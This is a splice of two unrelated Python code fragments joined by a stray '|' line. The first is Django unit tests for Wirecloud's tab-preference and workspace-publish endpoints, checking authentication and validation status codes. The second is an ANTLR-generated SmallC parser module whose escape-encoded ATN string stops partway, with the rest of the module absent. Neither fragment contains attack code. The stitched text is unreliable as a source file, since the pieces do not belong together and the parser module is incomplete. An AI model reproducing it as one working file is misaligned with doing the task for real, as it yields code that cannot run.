def test_tab_preference_collection_post_requires_authentication(self):
url = reverse('wirecloud.tab_preferences', kwargs={'workspace_id': 2, 'tab_id': 101})
data = {
'pref1': {'inherit': 'false', 'value': '5'},
'pref2': {'inherit': 'true', 'value': 'false'}
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_tab_preference_collection_post(self):
url = reverse('wirecloud.tab_preferences', kwargs={'workspace_id': 2, 'tab_id': 101})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
data = {
'pref1': '5',
'pref2': 'true',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
self.assertEqual(response.content, '')
def test_workspace_publish_requires_authentication(self):
url = reverse('wirecloud.workspace_publish', kwargs={'workspace_id': 2})
data = {
'vendor': 'Wirecloud',
'name': 'test-published-mashup',
'version': '1.0.5',
'email': 'test@example.com'
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_workspace_publish(self):
url = reverse('wirecloud.workspace_publish', kwargs={'workspace_id': 2})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
data = {
'vendor': 'Wirecloud',
'name': 'test-published-mashup',
'version': '1.0.5',
'email': 'test@example.com'
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 201)
def test_workspace_publish_bad_provided_data(self):
url = reverse('wirecloud.workspace_publish', kwargs={'workspace_id': 2})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Test missing parameters
data = {
'name': ''
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 400)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
# Test invalid version
data = {
'vendor': 'Wirecloud',
'name': 'test-published-mashup',
'version': '1.0.05',
'email': 'test@example.com'
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 400)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
|
# Generated from SmallC.g4 by ANTLR 4.5.3
# encoding: utf-8
from antlr4 import *
from io import StringIO
def serializedATN():
    """Return the serialized ATN for the SmallC grammar as a single string.

    Machine-generated by ANTLR 4.5.3 from ``SmallC.g4``; the escape-encoded
    payload below is consumed by ``ATNDeserializer`` and must not be edited
    by hand -- regenerate from the grammar instead.
    """
    with StringIO() as buf:
        buf.write("\3\u0430\ud6d1\u8206\uad2d\u4417\uaef1\u8d80\uaadd\38")
        buf.write("\u0229\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7\t\7")
        buf.write("\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r\4\16")
        buf.write("\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22\4\23\t\23")
        buf.write("\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27\4\30\t\30\4\31")
        buf.write("\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35\t\35\4\36\t\36")
        buf.write("\4\37\t\37\4 \t \4!\t!\4\"\t\"\4#\t#\4$\t$\4%\t%\4&\t")
        buf.write("&\4\'\t\'\4(\t(\4)\t)\4*\t*\4+\t+\4,\t,\4-\t-\4.\t.\4")
        buf.write("/\t/\4\60\t\60\4\61\t\61\4\62\t\62\4\63\t\63\4\64\t\64")
        buf.write("\3\2\3\2\3\3\3\3\3\3\3\3\3\3\5\3p\n\3\3\4\3\4\3\4\3\4")
        buf.write("\3\4\3\4\3\4\5\4y\n\4\3\5\3\5\3\5\3\5\3\5\3\5\7\5\u0081")
        buf.write("\n\5\f\5\16\5\u0084\13\5\3\6\3\6\3\6\3\6\3\6\3\6\7\6\u008c")
        buf.write("\n\6\f\6\16\6\u008f\13\6\3\7\3\7\3\b\3\b\3\t\3\t\3\n\3")
        buf.write("\n\3\n\3\n\3\n\3\n\3\n\3\n\3\n\7\n\u00a0\n\n\f\n\16\n")
        buf.write("\u00a3\13\n\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3")
        buf.write("\13\3\13\3\13\3\13\3\13\3\13\3\13\7\13\u00b4\n\13\f\13")
        buf.write("\16\13\u00b7\13\13\3\f\3\f\3\r\3\r\3\r\3\r\3\r\3\r\3\r")
        buf.write("\3\r\3\r\7\r\u00c4\n\r\f\r\16\r\u00c7\13\r\3\16\3\16\3")
        buf.write("\16\3\16\3\16\3\16\3\16\3\16\3\16\3\16\3\16\3\16\7\16")
        buf.write("\u00d5\n\16\f\16\16\16\u00d8\13\16\3\17\3\17\3\17\3\17")
        buf.write("\3\17\3\17\3\17\3\17\3\17\3\17\3\17\3\17\3\17\3\17\3\17")
        buf.write("\3\17\3\17\3\17\3\17\3\17\3\17\5\17\u00ef\n\17\3\20\3")
        buf.write("\20\3\20\3\20\3\20\3\20\3\20\3\20\3\20\3\20\5\20\u00fb")
        buf.write("\n\20\3\20\3\20\3\20\3\20\3\20\3\20\3\20\3\20\3\20\7\20")
        buf.write("\u0106\n\20\f\20\16\20\u0109\13\20\3\21\3\21\3\21\3\21")
        buf.write("\3\21\3\21\7\21\u0111\n\21\f\21\16\21\u0114\13\21\3\22")
        buf.write("\3\22\3\22\3\22\3\22\3\22\3\22\5\22\u011d\n\22\3\23\3")
        buf.write("\23\3\23\3\23\3\24\3\24\3\25\6\25\u0126\n\25\r\25\16\25")
        buf.write("\u0127\3\25\7\25\u012b\n\25\f\25\16\25\u012e\13\25\3\25")
        buf.write("\3\25\3\25\3\25\3\25\3\25\3\26\6\26\u0137\n\26\r\26\16")
        buf.write("\26\u0138\3\26\7\26\u013c\n\26\f\26\16\26\u013f\13\26")
        buf.write("\3\26\3\26\3\26\3\26\3\26\3\26\3\27\3\27\3\27\3\27\7\27")
        buf.write("\u014b\n\27\f\27\16\27\u014e\13\27\3\27\5\27\u0151\n\27")
        buf.write("\3\30\6\30\u0154\n\30\r\30\16\30\u0155\3\30\7\30\u0159")
        buf.write("\n\30\f\30\16\30\u015c\13\30\3\30\5\30\u015f\n\30\3\30")
        buf.write("\5\30\u0162\n\30\3\31\3\31\5\31\u0166\n\31\3\32\3\32\5")
        buf.write("\32\u016a\n\32\3\32\3\32\3\33\3\33\7\33\u0170\n\33\f\33")
        buf.write("\16\33\u0173\13\33\3\33\3\33\3\34\3\34\3\34\3\34\3\34")
        buf.write("\3\34\3\34\3\34\3\34\3\34\3\34\3\34\3\34\3\34\3\34\5\34")
        buf.write("\u0186\n\34\3\35\3\35\3\35\3\35\3\35\3\35\3\35\5\35\u018f")
        buf.write("\n\35\3\36\3\36\3\36\3\36\3\36\3\36\5\36\u0197\n\36\3")
        buf.write("\37\3\37\3\37\3 \3 \3 \3 \3 \3 \3!\3!\3!\3!\3!\3!\3!\3")
        buf.write("!\3\"\3\"\3\"\3\"\5\"\u01ae\n\"\3\"\3\"\3\"\3\"\3\"\3")
        buf.write("\"\3\"\3#\6#\u01b8\n#\r#\16#\u01b9\3#\3#\3#\7#\u01bf\n")
        buf.write("#\f#\16#\u01c2\13#\3$\3$\5$\u01c6\n$\3%\3%\3&\3&\3&\3")
        buf.write("&\3&\5&\u01cf\n&\3&\3&\3&\5&\u01d4\n&\5&\u01d6\n&\3\'")
        buf.write("\3\'\3\'\3\'\3\'\3\'\5\'\u01de\n\'\5\'\u01e0\n\'\3(\3")
        buf.write("(\3(\3(\3(\7(\u01e7\n(\f(\16(\u01ea\13(\3(\3(\6(\u01ee")
        buf.write("\n(\r(\16(\u01ef\3(\3(\5(\u01f4\n(\3)\3)\3)\3)\7)\u01fa")
        buf.write("\n)\f)\16)\u01fd\13)\5)\u01ff\n)\3)\3)\5)\u0203\n)\3*")
        buf.write("\3*\5*\u0207\n*\3+\3+\3+\7+\u020c\n+\f+\16+\u020f\13+")
        buf.write("\3+\5+\u0212\n+\3,\3,\3,\3,\3,\3-\3-\3.\3.\3/\3/\3\60")
        buf.write("\3\60\3\61\3\61\3\62\3\62\3\63\3\63\3\64\3\64\3\64\2\t")
        buf.write("\b\n\22\24\30\32\36\65\2\4\6\b\n\f\16\20\22\24\26\30\32")
        buf.write("\34\36 \"$&(*,.\60\62\64\668:<>@BDFHJLNPRTVXZ\\^`bdf\2")
        buf.write("\3\3\2\"%\u024a\2h\3\2\2\2\4o\3\2\2\2\6x\3\2\2\2\bz\3")
        buf.write("\2\2\2\n\u0085\3\2\2\2\f\u0090\3\2\2\2\16\u0092\3\2\2")
        buf.write("\2\20\u0094\3\2\2\2\22\u0096\3\2\2\2\24\u00a4\3\2\2\2")
        buf.write("\26\u00b8\3\2\2\2\30\u00ba\3\2\2\2\32\u00c8\3\2\2\2\34")
        buf.write("\u00ee\3\2\2\2\36\u00fa\3\2\2\2 \u0112\3\2\2\2\"\u011c")
        buf.write("\3\2\2\2$\u011e\3\2\2\2&\u0122\3\2\2\2(\u0125\3\2\2\2")
        buf.write("*\u0136\3\2\2\2,\u0150\3\2\2\2.\u0153\3\2\2\2\60\u0163")
        buf.write("\3\2\2\2\62\u0167\3\2\2\2\64\u016d\3\2\2\2\66\u0185\3")
        buf.write("\2\2\28\u018e\3\2\2\2:\u0190\3\2\2\2<\u0198\3\2\2\2>\u019b")
        buf.write("\3\2\2\2@\u01a1\3\2\2\2B\u01a9\3\2\2\2D\u01b7\3\2\2\2")
        buf.write("F\u01c5\3\2\2\2H\u01c7\3\2\2\2J\u01d5\3\2\2\2L\u01df\3")
        buf.write("\2\2\2N\u01f3\3\2\2\2P\u0202\3\2\2\2R\u0204\3\2\2\2T\u0211")
        buf.write("\3\2\2\2V\u0213\3\2\2\2X\u0218\3\2\2\2Z\u021a\3\2\2\2")
        buf.write("\\\u021c\3\2\2\2^\u021e\3\2\2\2`\u0220\3\2\2\2b\u0222")
        buf.write("\3\2\2\2d\u0224\3\2\2\2f\u0226\3\2\2\2hi\5\4\3\2i\3\3")
        buf.write("\2\2\2jk\5\6\4\2kl\7\3\2\2lm\5\4\3\2mp\3\2\2\2np\5\6\4")
        buf.write("\2oj\3\2\2\2on\3\2\2\2p\5\3\2\2\2qr\5\b\5\2rs\7\4\2\2")
        buf.write("st\5\b\5\2tu\7\5\2\2uv\5\6\4\2vy\3\2\2\2wy\5\b\5\2xq\3")
        buf.write("\2\2\2xw\3\2\2\2y\7\3\2\2\2z{\b\5\1\2{|\5\n\6\2|\u0082")
        buf.write("\3\2\2\2}~\f\4\2\2~\177\7\6\2\2\177\u0081\5\n\6\2\u0080")
        buf.write("}\3\2\2\2\u0081\u0084\3\2\2\2\u0082\u0080\3\2\2\2\u0082")
        buf.write("\u0083\3\2\2\2\u0083\t\3\2\2\2\u0084\u0082\3\2\2\2\u0085")
        buf.write("\u0086\b\6\1\2\u0086\u0087\5\22\n\2\u0087\u008d\3\2\2")
        buf.write("\2\u0088\u0089\f\4\2\2\u0089\u008a\7\7\2\2\u008a\u008c")
        buf.write("\5\22\n\2\u008b\u0088\3\2\2\2\u008c\u008f\3\2\2\2\u008d")
        buf.write("\u008b\3\2\2\2\u008d\u008e\3\2\2\2\u008e\13\3\2\2\2\u008f")
        buf.write("\u008d\3\2\2\2\u0090\u0091\5\16\b\2\u0091\r\3\2\2\2\u0092")
        buf.write("\u0093\5\20\t\2\u0093\17\3\2\2\2\u0094\u0095\5\22\n\2")
        buf.write("\u0095\21\3\2\2\2\u0096\u0097\b\n\1\2\u0097\u0098\5\24")
        buf.write("\13\2\u0098\u00a1\3\2\2\2\u0099\u009a\f\5\2\2\u009a\u009b")
        buf.write("\7\b\2\2\u009b\u00a0\5\24\13\2\u009c\u009d\f\4\2\2\u009d")
        buf.write("\u009e\7\t\2\2\u009e\u00a0\5\24\13\2\u009f\u0099\3\2\2")
        buf.write("\2\u009f\u009c\3\2\2\2\u00a0\u00a3\3\2\2\2\u00a1\u009f")
        buf.write("\3\2\2\2\u00a1\u00a2\3\2\2\2\u00a2\23\3\2\2\2\u00a3\u00a1")
        buf.write("\3\2\2\2\u00a4\u00a5\b\13\1\2\u00a5\u00a6\5\30\r\2\u00a6")
        buf.write("\u00b5\3\2\2\2\u00a7\u00a8\f\7\2\2\u00a8\u00a9\7\33\2")
        buf.write("\2\u00a9\u00b4\5\30\r\2\u00aa\u00ab\f\6\2\2\u00ab\u00ac")
        buf.write("\7\n\2\2\u00ac\u00b4\5\30\r\2\u00ad\u00ae\f\5\2\2\u00ae")
        buf.write("\u00af\7\34\2\2\u00af\u00b4\5\30\r\2\u00b0\u00b1\f\4\2")
        buf.write("\2\u00b1\u00b2\7\13\2\2\u00b2\u00b4\5\30\r\2\u00b3\u00a7")
        buf.write("\3\2\2\2\u00b3\u00aa\3\2\2\2\u00b3\u00ad\3\2\2\2\u00b3")
        buf.write("\u00b0\3\2\2\2\u00b4\u00b7\3\2\2\2\u00b5\u00b3\3\2\2\2")
        buf.write("\u00b5\u00b6\3\2\2\2\u00b6\25\3\2\2\2\u00b7\u00b5\3\2")
        buf.write("\2\2\u00b8\u00b9\5\30\r\2\u00b9\27\3\2\2\2\u00ba\u00bb")
        buf.write("\b\r\1\2\u00bb\u00bc\5\32\16\2\u00bc\u00c5\3\2\2\2\u00bd")
        buf.write("\u00be\f\5\2\2\u00be\u00bf\7\f\2\2\u00bf\u00c4\5\32\16")
        buf.write("\2\u00c0\u00c1\f\4\2\2\u00c1\u00c2\7\r\2\2\u00c2\u00c4")
        buf.write("\5\32\16\2\u00c3\u00bd\3\2\2\2\u00c3\u00c0\3\2\2\2\u00c4")
        buf.write("\u00c7\3\2\2\2\u00c5\u00c3\3\2\2\2\u00c5\u00c6\3\2\2\2")
        buf.write("\u00c6\31\3\2\2\2\u00c7\u00c5\3\2\2\2\u00c8\u00c9\b\16")
        buf.write("\1\2\u00c9\u00ca\5\34\17\2\u00ca\u00d6\3\2\2\2\u00cb\u00cc")
        buf.write("\f\6\2\2\u00cc\u00cd\7\16\2\2\u00cd\u00d5\5\34\17\2\u00ce")
        buf.write("\u00cf\f\5\2\2\u00cf\u00d0\7\17\2\2\u00d0\u00d5\5\34\17")
        buf.write("\2\u00d1\u00d2\f\4\2\2\u00d2\u00d3\7\20\2\2\u00d3\u00d5")
        buf.write("\5\34\17\2\u00d4\u00cb\3\2\2\2\u00d4\u00ce\3\2\2\2\u00d4")
        buf.write("\u00d1\3\2\2\2\u00d5\u00d8\3\2\2\2\u00d6\u00d4\3\2\2\2")
        buf.write("\u00d6\u00d7\3\2\2\2\u00d7\33\3\2\2\2\u00d8\u00d6\3\2")
        buf.write("\2\2\u00d9\u00da\7\21\2\2\u00da\u00ef\5\34\17\2\u00db")
        buf.write("\u00dc\7\22\2\2\u00dc\u00ef\5\34\17\2\u00dd\u00de\7\f")
        buf.write("\2\2\u00de\u00ef\5\34\17\2\u00df\u00e0\7\r\2\2\u00e0\u00ef")
        buf.write("\5\34\17\2\u00e1\u00e2\7\23\2\2\u00e2\u00ef\5\36\20\2")
        buf.write("\u00e3\u00e4\7\16\2\2\u00e4\u00ef\5\34\17\2\u00e5\u00e6")
        buf.write("\7\24\2\2\u00e6\u00ef\5\34\17\2\u00e7\u00ef\5V,\2\u00e8")
        buf.write("\u00e9\7\31\2\2\u00e9\u00ea\5^\60\2\u00ea\u00eb\7\32\2")
        buf.write("\2\u00eb\u00ec\5\34\17\2\u00ec\u00ef\3\2\2\2\u00ed\u00ef")
        buf.write("\5\36\20\2\u00ee\u00d9\3\2\2\2\u00ee\u00db\3\2\2\2\u00ee")
        buf.write("\u00dd\3\2\2\2\u00ee\u00df\3\2\2\2\u00ee\u00e1\3\2\2\2")
        buf.write("\u00ee\u00e3\3\2\2\2\u00ee\u00e5\3\2\2\2\u00ee\u00e7\3")
        buf.write("\2\2\2\u00ee\u00e8\3\2\2\2\u00ee\u00ed\3\2\2\2\u00ef\35")
        buf.write("\3\2\2\2\u00f0\u00f1\b\20\1\2\u00f1\u00fb\5X-\2\u00f2")
        buf.write("\u00fb\5`\61\2\u00f3\u00fb\5b\62\2\u00f4\u00fb\5d\63\2")
        buf.write("\u00f5\u00fb\5f\64\2\u00f6\u00f7\7\31\2\2\u00f7\u00f8")
        buf.write("\58\35\2\u00f8\u00f9\7\32\2\2\u00f9\u00fb\3\2\2\2\u00fa")
        buf.write("\u00f0\3\2\2\2\u00fa\u00f2\3\2\2\2\u00fa\u00f3\3\2\2\2")
        buf.write("\u00fa\u00f4\3\2\2\2\u00fa\u00f5\3\2\2\2\u00fa\u00f6\3")
        buf.write("\2\2\2\u00fb\u0107\3\2\2\2\u00fc\u00fd\f\13\2\2\u00fd")
        buf.write("\u0106\7\21\2\2\u00fe\u00ff\f\n\2\2\u00ff\u0106\7\22\2")
        buf.write("\2\u0100\u0101\f\t\2\2\u0101\u0102\7\37\2\2\u0102\u0103")
        buf.write("\58\35\2\u0103\u0104\7 \2\2\u0104\u0106\3\2\2\2\u0105")
        buf.write("\u00fc\3\2\2\2\u0105\u00fe\3\2\2\2\u0105\u0100\3\2\2\2")
        buf.write("\u0106\u0109\3\2\2\2\u0107\u0105\3\2\2\2\u0107\u0108\3")
        buf.write("\2\2\2\u0108\37\3\2\2\2\u0109\u0107\3\2\2\2\u010a\u0111")
        buf.write("\5\"\22\2\u010b\u0111\5(\25\2\u010c\u0111\5*\26\2\u010d")
        buf.write("\u010e\5D#\2\u010e\u010f\7\25\2\2\u010f\u0111\3\2\2\2")
        buf.write("\u0110\u010a\3\2\2\2\u0110\u010b\3\2\2\2\u0110\u010c\3")
        buf.write("\2\2\2\u0110\u010d\3\2\2\2\u0111\u0114\3\2\2\2\u0112\u0110")
        buf.write("\3\2\2\2\u0112\u0113\3\2\2\2\u0113!\3\2\2\2\u0114\u0112")
        buf.write("\3\2\2\2\u0115\u0116\7\26\2\2\u0116\u0117\7\33\2\2\u0117")
        buf.write("\u0118\5$\23\2\u0118\u0119\7\34\2\2\u0119\u011d\3\2\2")
        buf.write("\2\u011a\u011b\7\26\2\2\u011b\u011d\5&\24\2\u011c\u0115")
        buf.write("\3\2\2\2\u011c\u011a\3\2\2\2\u011d#\3\2\2\2\u011e\u011f")
        buf.write("\5Z.\2\u011f\u0120\7\27\2\2\u0120\u0121\5Z.\2\u0121%\3")
        buf.write("\2\2\2\u0122\u0123\5f\64\2\u0123\'\3\2\2\2\u0124\u0126")
        buf.write("\5F$\2\u0125\u0124\3\2\2\2\u0126\u0127\3\2\2\2\u0127\u0125")
        buf.write("\3\2\2\2\u0127\u0128\3\2\2\2\u0128\u012c\3\2\2\2\u0129")
        buf.write("\u012b\5\60\31\2\u012a\u0129\3\2\2\2\u012b\u012e\3\2\2")
        buf.write("\2\u012c\u012a\3\2\2\2\u012c\u012d\3\2\2\2\u012d\u012f")
        buf.write("\3\2\2\2\u012e\u012c\3\2\2\2\u012f\u0130\5Z.\2\u0130\u0131")
        buf.write("\7\31\2\2\u0131\u0132\5,\27\2\u0132\u0133\7\32\2\2\u0133")
        buf.write("\u0134\7\25\2\2\u0134)\3\2\2\2\u0135\u0137\5F$\2\u0136")
        buf.write("\u0135\3\2\2\2\u0137\u0138\3\2\2\2\u0138\u0136\3\2\2\2")
        buf.write("\u0138\u0139\3\2\2\2\u0139\u013d\3\2\2\2\u013a\u013c\5")
        buf.write("\60\31\2\u013b\u013a\3\2\2\2\u013c\u013f\3\2\2\2\u013d")
        buf.write("\u013b\3\2\2\2\u013d\u013e\3\2\2\2\u013e\u0140\3\2\2\2")
        buf.write("\u013f\u013d\3\2\2\2\u0140\u0141\5Z.\2\u0141\u0142\7\31")
        buf.write("\2\2\u0142\u0143\5,\27\2\u0143\u0144\7\32\2\2\u0144\u0145")
        buf.write("\5\64\33\2\u0145+\3\2\2\2\u0146\u0151\3\2\2\2\u0147\u014c")
        buf.write("\5.\30\2\u0148\u0149\7\30\2\2\u0149\u014b\5.\30\2\u014a")
        buf.write("\u0148\3\2\2\2\u014b\u014e\3\2\2\2\u014c\u014a\3\2\2\2")
        buf.write("\u014c\u014d\3\2\2\2\u014d\u0151\3\2\2\2\u014e\u014c\3")
        buf.write("\2\2\2\u014f\u0151\3\2\2\2\u0150\u0146\3\2\2\2\u0150\u0147")
        buf.write("\3\2\2\2\u0150\u014f\3\2\2\2\u0151-\3\2\2\2\u0152\u0154")
        buf.write("\5F$\2\u0153\u0152\3\2\2\2\u0154\u0155\3\2\2\2\u0155\u0153")
        buf.write("\3\2\2\2\u0155\u0156\3\2\2\2\u0156\u015a\3\2\2\2\u0157")
        buf.write("\u0159\5\60\31\2\u0158\u0157\3\2\2\2\u0159\u015c\3\2\2")
        buf.write("\2\u015a\u0158\3\2\2\2\u015a\u015b\3\2\2\2\u015b\u015e")
        buf.write("\3\2\2\2\u015c\u015a\3\2\2\2\u015d\u015f\5Z.\2\u015e\u015d")
        buf.write("\3\2\2\2\u015e\u015f\3\2\2\2\u015f\u0161\3\2\2\2\u0160")
        buf.write("\u0162\5\62\32\2\u0161\u0160\3\2\2\2\u0161\u0162\3\2\2")
        buf.write("\2\u0162/\3\2\2\2\u0163\u0165\5\\/\2\u0164\u0166\5H%\2")
        buf.write("\u0165\u0164\3\2\2\2\u0165\u0166\3\2\2\2\u0166\61\3\2")
        buf.write("\2\2\u0167\u0169\7\37\2\2\u0168\u016a\58\35\2\u0169\u0168")
        buf.write("\3\2\2\2\u0169\u016a\3\2\2\2\u016a\u016b\3\2\2\2\u016b")
        buf.write("\u016c\7 \2\2\u016c\63\3\2\2\2\u016d\u0171\7\35\2\2\u016e")
        buf.write("\u0170\5\66\34\2\u016f\u016e\3\2\2\2\u0170\u0173\3\2\2")
        buf.write("\2\u0171\u016f\3\2\2\2\u0171\u0172\3\2\2\2\u0172\u0174")
        buf.write("\3\2\2\2\u0173\u0171\3\2\2\2\u0174\u0175\7\36\2\2\u0175")
        buf.write("\65\3\2\2\2\u0176\u0186\5\64\33\2\u0177\u0186\5:\36\2")
        buf.write("\u0178\u0186\5> \2\u0179\u0186\5@!\2\u017a\u0186\5B\"")
        buf.write("\2\u017b\u017c\58\35\2\u017c\u017d\7\25\2\2\u017d\u0186")
        buf.write("\3\2\2\2\u017e\u017f\5D#\2\u017f\u0180\7\25\2\2\u0180")
        buf.write("\u0186\3\2\2\2\u0181\u0182\5R*\2\u0182\u0183\7\25\2\2")
        buf.write("\u0183\u0186\3\2\2\2\u0184\u0186\7\25\2\2\u0185\u0176")
        buf.write("\3\2\2\2\u0185\u0177\3\2\2\2\u0185\u0178\3\2\2\2\u0185")
        buf.write("\u0179\3\2\2\2\u0185\u017a\3\2\2\2\u0185\u017b\3\2\2\2")
        buf.write("\u0185\u017e\3\2\2\2\u0185\u0181\3\2\2\2\u0185\u0184\3")
        buf.write("\2\2\2\u0186\67\3\2\2\2\u0187\u018f\5X-\2\u0188\u018f")
        buf.write("\5`\61\2\u0189\u018f\5b\62\2\u018a\u018f\5d\63\2\u018b")
        buf.write("\u018f\5f\64\2\u018c\u018f\5V,\2\u018d\u018f\5\4\3\2\u018e")
        buf.write("\u0187\3\2\2\2\u018e\u0188\3\2\2\2\u018e\u0189\3\2\2\2")
        buf.write("\u018e\u018a\3\2\2\2\u018e\u018b\3\2\2\2\u018e\u018c\3")
        buf.write("\2\2\2\u018e\u018d\3\2\2\2\u018f9\3\2\2\2\u0190\u0191")
        buf.write("\7)\2\2\u0191\u0192\7\31\2\2\u0192\u0193\58\35\2\u0193")
        buf.write("\u0194\7\32\2\2\u0194\u0196\5\66\34\2\u0195\u0197\5<\37")
        buf.write("\2\u0196\u0195\3\2\2\2\u0196\u0197\3\2\2\2\u0197;\3\2")
        buf.write("\2\2\u0198\u0199\7*\2\2\u0199\u019a\5\66\34\2\u019a=\3")
        buf.write("\2\2\2\u019b\u019c\7,\2\2\u019c\u019d\7\31\2\2\u019d\u019e")
        buf.write("\58\35\2\u019e\u019f\7\32\2\2\u019f\u01a0\5\66\34\2\u01a0")
        buf.write("?\3\2\2\2\u01a1\u01a2\7+\2\2\u01a2\u01a3\5\64\33\2\u01a3")
        buf.write("\u01a4\7,\2\2\u01a4\u01a5\7\31\2\2\u01a5\u01a6\58\35\2")
        buf.write("\u01a6\u01a7\7\32\2\2\u01a7\u01a8\7\25\2\2\u01a8A\3\2")
        buf.write("\2\2\u01a9\u01aa\7-\2\2\u01aa\u01ad\7\31\2\2\u01ab\u01ae")
        buf.write("\5D#\2\u01ac\u01ae\5X-\2\u01ad\u01ab\3\2\2\2\u01ad\u01ac")
        buf.write("\3\2\2\2\u01ae\u01af\3\2\2\2\u01af\u01b0\7\25\2\2\u01b0")
        buf.write("\u01b1\58\35\2\u01b1\u01b2\7\25\2\2\u01b2\u01b3\58\35")
        buf.write("\2\u01b3\u01b4\7\32\2\2\u01b4\u01b5\5\64\33\2\u01b5C\3")
        buf.write("\2\2\2\u01b6\u01b8\5F$\2\u01b7\u01b6\3\2\2\2\u01b8\u01b9")
        buf.write("\3\2\2\2\u01b9\u01b7\3\2\2\2\u01b9\u01ba\3\2\2\2\u01ba")
        buf.write("\u01bb\3\2\2\2\u01bb\u01c0\5J&\2\u01bc\u01bd\7\30\2\2")
        buf.write("\u01bd\u01bf\5J&\2\u01be\u01bc\3\2\2\2\u01bf\u01c2\3\2")
        buf.write("\2\2\u01c0\u01be\3\2\2\2\u01c0\u01c1\3\2\2\2\u01c1E\3")
        buf.write("\2\2\2\u01c2\u01c0\3\2\2\2\u01c3\u01c6\5^\60\2\u01c4\u01c6")
        buf.write("\5H%\2\u01c5\u01c3\3\2\2\2\u01c5\u01c4\3\2\2\2\u01c6G")
        buf.write("\3\2\2\2\u01c7\u01c8\7&\2\2\u01c8I\3\2\2\2\u01c9\u01ca")
        buf.write("\7\31\2\2\u01ca\u01cb\5L\'\2\u01cb\u01ce\7\32\2\2\u01cc")
        buf.write("\u01cd\7\3\2\2\u01cd\u01cf\5P)\2\u01ce\u01cc\3\2\2\2\u01ce")
        buf.write("\u01cf\3\2\2\2\u01cf\u01d6\3\2\2\2\u01d0\u01d3\5L\'\2")
        buf.write("\u01d1\u01d2\7\3\2\2\u01d2\u01d4\5P)\2\u01d3\u01d1\3\2")
        buf.write("\2\2\u01d3\u01d4\3\2\2\2\u01d4\u01d6\3\2\2\2\u01d5\u01c9")
        buf.write("\3\2\2\2\u01d5\u01d0\3\2\2\2\u01d6K\3\2\2\2\u01d7\u01d8")
        buf.write("\7\31\2\2\u01d8\u01d9\5L\'\2\u01d9\u01da\7\32\2\2\u01da")
        buf.write("\u01e0\3\2\2\2\u01db\u01dd\5N(\2\u01dc\u01de\5\62\32\2")
        buf.write("\u01dd\u01dc\3\2\2\2\u01dd\u01de\3\2\2\2\u01de\u01e0\3")
        buf.write("\2\2\2\u01df\u01d7\3\2\2\2\u01df\u01db\3\2\2\2\u01e0M")
        buf.write("\3\2\2\2\u01e1\u01e2\7\31\2\2\u01e2\u01e3\5N(\2\u01e3")
        buf.write("\u01e4\7\32\2\2\u01e4\u01f4\3\2\2\2\u01e5\u01e7\5\60\31")
        buf.write("\2\u01e6\u01e5\3\2\2\2\u01e7\u01ea\3\2\2\2\u01e8\u01e6")
        buf.write("\3\2\2\2\u01e8\u01e9\3\2\2\2\u01e9\u01eb\3\2\2\2\u01ea")
        buf.write("\u01e8\3\2\2\2\u01eb\u01f4\5Z.\2\u01ec\u01ee\5\60\31\2")
        buf.write("\u01ed\u01ec\3\2\2\2\u01ee\u01ef\3\2\2\2\u01ef\u01ed\3")
        buf.write("\2\2\2\u01ef\u01f0\3\2\2\2\u01f0\u01f1\3\2\2\2\u01f1\u01f2")
        buf.write("\5L\'\2\u01f2\u01f4\3\2\2\2\u01f3\u01e1\3\2\2\2\u01f3")
        buf.write("\u01e8\3\2\2\2\u01f3\u01ed\3\2\2\2\u01f4O\3\2\2\2\u01f5")
        buf.write("\u01fe\7\35\2\2\u01f6\u01fb\58\35\2\u01f7\u01f8\7\30\2")
        buf.write("\2\u01f8\u01fa\58\35\2\u01f9\u01f7\3\2\2\2\u01fa\u01fd")
        buf.write("\3\2\2\2\u01fb\u01f9\3\2\2\2\u01fb\u01fc\3\2\2\2\u01fc")
        buf.write("\u01ff\3\2\2\2\u01fd\u01fb\3\2\2\2\u01fe\u01f6\3\2\2\2")
        buf.write("\u01fe\u01ff\3\2\2\2\u01ff\u0200\3\2\2\2\u0200\u0203\7")
        buf.write("\36\2\2\u0201\u0203\58\35\2\u0202\u01f5\3\2\2\2\u0202")
        buf.write("\u0201\3\2\2\2\u0203Q\3\2\2\2\u0204\u0206\7\60\2\2\u0205")
        buf.write("\u0207\58\35\2\u0206\u0205\3\2\2\2\u0206\u0207\3\2\2\2")
        buf.write("\u0207S\3\2\2\2\u0208\u020d\58\35\2\u0209\u020a\7\30\2")
        buf.write("\2\u020a\u020c\58\35\2\u020b\u0209\3\2\2\2\u020c\u020f")
        buf.write("\3\2\2\2\u020d\u020b\3\2\2\2\u020d\u020e\3\2\2\2\u020e")
        buf.write("\u0212\3\2\2\2\u020f\u020d\3\2\2\2\u0210\u0212\3\2\2\2")
        buf.write("\u0211\u0208\3\2\2\2\u0211\u0210\3\2\2\2\u0212U\3\2\2")
        buf.write("\2\u0213\u0214\5Z.\2\u0214\u0215\7\31\2\2\u0215\u0216")
        buf.write("\5T+\2\u0216\u0217\7\32\2\2\u0217W\3\2\2\2\u0218\u0219")
        buf.write("\5Z.\2\u0219Y\3\2\2\2\u021a\u021b\7\65\2\2\u021b[\3\2")
